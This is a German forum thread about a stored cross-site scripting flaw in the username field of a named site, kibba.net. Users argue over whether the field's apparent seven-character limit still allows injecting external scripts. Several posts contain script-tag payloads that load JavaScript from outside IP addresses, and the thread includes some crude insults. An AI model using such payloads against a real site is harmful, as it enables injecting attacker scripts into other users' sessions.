Kibba.net - Stored XSS

  • @einmadejay. Stimmt nur teilweise. Du kannst alles bis zu einer bestimmten Länge injecten. Ich schätze mal grob 7 Zeichen ab. Wenn es länger ist passt es nicht mehr in das Feld in der Tabelle der Datenbank. (Genau weiß ich das nicht, meine Meinung).

    Maximal sieben Zeichen. Sonst wird ein Fehler generiert. Sei es HTML, CSS oder Javascript Code.

    nobody@xmpp.ninja

    FatalSecurity

  • @einmadejay. Stimmt nur teilweise. Du kannst alles bis zu einer bestimmten Länge injecten. Ich schätze mal grob 7 Zeichen ab. Wenn es länger ist passt es nicht mehr in das Feld in der Tabelle der Datenbank. (Genau weiß ich das nicht, meine Meinung).

    Du kannst also alles was du willst nur bis 7 Zeichen injecten. Sei es HTML, CSS oder Javascript Code.

    <script src="link/script.js"></script>
    & schon kannste alles machen.

  • @

    Stimmt leider nicht. Du hast kein Zugriff auf den Server. Das bedeutet du müsstest auf einen anderen, externen Server den Link setzen.z.B <script src="http://194.123.15.1/link/script.js"></script>. Das Überschreitet die x Zeichen und es wird ein Error geworfen

    Nenn mir bitte ein POC den ich selbst testen kann. Der diese Länge nicht überschreitet und ein Script von einem externen Server lädt. Dann reden wir weiter.

    Also ich hab innerhalb von 30 Sekunden einen Payload gefunden mit dem man externe Script einbinden kann :) Komm schon, ihr seid doch Hacker! Ihr müsst sowas doch können!

  • Finden ist einfach, funktionieren ist eine andere Sache. Bsp.:

    Code
    <SCRIPT SRC=http://5.230.225.107/1.js>

    Das Script wurde zwar geladen, wurde aber nicht ausgeführt.

    Und jetzt zeig den POC.

    nobody@xmpp.ninja

    FatalSecurity

  • @einmadejay . Das ist kein POC. POC = Proof of concept.
    Gib mir jetzt einen einfachen Payload der dort hinein passt.
    Sonst muss ich dich jetzt als Noob einstufen.
    Den Link den du mir geschickt hast wird da schonmal gar nicht hineinpassen.

    P.S: Nenne mir mal die "diversen Links".

    nobody@xmpp.ninja

    FatalSecurity

  • @eimadejay Es können mit <script src=""></script> grade mal 4 Buchstaben zwischen die "" geschrieben werden.
    Wenn man Glück hat funktioneren die self-closing Tags <script src="src.js" />

    Jo, war ein nice try.

    @einmadejay . Das ist kein POC. POC = Proof of concept.
    Gib mir jetzt einen einfachen Payload der dort hinein passt.
    Sonst muss ich dich jetzt als Noob einstufen.
    Den Link den du mir geschickt hast wird da schonmal gar nicht hineinpassen.

    P.S: Nenne mir mal die "diversen Links".

    ^ siehe oben.

    In Endeffekt ist es mir sogar relativ egal, als was du mich einstufst. Ich mein, was soll es mich interessieren? XD
    Wieso direkt so offensiv?

  • @einmadejay . Ich verstehe nicht denn Sinn hinter dem ganzen Müll den du hier reinschreibst. Wenn du keine Ahnung von diesem Thema hast, dann schreib nichts und verpiss dich einfach.

    Ayy lmao da ist jemand ziemlich mad.
    Da macht jemand anderes mal einen Fehler und er sieht es als Chance seine Aggressionen mal auszulassen.
    & von diesem Thema? Woher soll ich denn bitte wissen wie viele Zeichen im Usernamen erlaubt sind? Meine Aussagen liefen über Spekulationen lol.

  • Ayy lmao da ist jemand ziemlich mad.Da macht jemand anderes mal einen Fehler und er sieht es als Chance seine Aggressionen mal auszulassen.
    & von diesem Thema? Woher soll ich denn bitte wissen wie viele Zeichen im Usernamen erlaubt sind? Meine Aussagen liefen über Spekulationen lol.

    Wie man unschwer auf der ersten Seite dieses Post's erkennen kann, ist der Username auf geschätzt 7 Zeichen begrenzt.

    Nix da.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!